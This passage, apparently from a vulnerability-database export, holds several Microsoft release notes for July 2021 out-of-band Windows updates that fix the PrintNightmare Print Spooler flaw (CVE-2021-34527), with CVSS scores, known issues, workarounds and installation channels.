12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5003711) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/en-us/help/4535697>).If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004947>)website. \nWindows Server Update Services (WSUS)| Yes| You can import this update into WSUS manually. See the [Microsoft Update Catalog](<https://docs.microsoft.com/en-us/windows-server/administration/windows-server-update-services/manage/wsus-and-the-catalog-site#the-microsoft-update-catalog-site>) for instructions. \n**File information **For a list of the files that are provided in this update, download the [file information for cumulative update 5004947](<https://download.microsoft.com/download/5/5/3/553b918f-10d2-4ecb-aa41-3aad1fbfe0c3/5004947.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004947 (OS Build 17763.2029) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004947", "href": "https://support.microsoft.com/en-us/help/5004947", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:43", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001399) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004950>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004950](<https://download.microsoft.com/download/7/6/2/7621b6b3-765e-4b2a-9358-5d49ad17e3fa/5004950.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004950 (OS Build 10240.18969) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004950", "href": "https://support.microsoft.com/en-us/help/5004950", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:46", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010[.](<https://support.microsoft.com/help/5005010>)\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004960>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004960](<https://download.microsoft.com/download/b/6/5/b6562791-88a6-461f-a98d-366e9f7c194f/5004960.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004960 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004960", "href": "https://support.microsoft.com/en-us/help/5004960", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:45", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003661](<https://support.microsoft.com/help/5003661>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010.](<https://support.microsoft.com/help/5005010>)\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to &lt;Server name&gt;, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004955>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004955](<https://download.microsoft.com/download/c/8/8/c88a24bd-9f1c-4cf1-8e26-cb65bd2ef4c7/5004955.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004955 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004955", "href": "https://support.microsoft.com/en-us/help/5004955", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:43", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive the following error: \n \n\"Cannot connect to &lt;Server name&gt;, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004951>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004951](<https://download.microsoft.com/download/e/b/5/eb523bca-d712-4df9-991a-c3ba662ee308/5004951.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004951 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004951", "href": "https://support.microsoft.com/en-us/help/5004951", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:46", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to &lt;Server name&gt;, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL 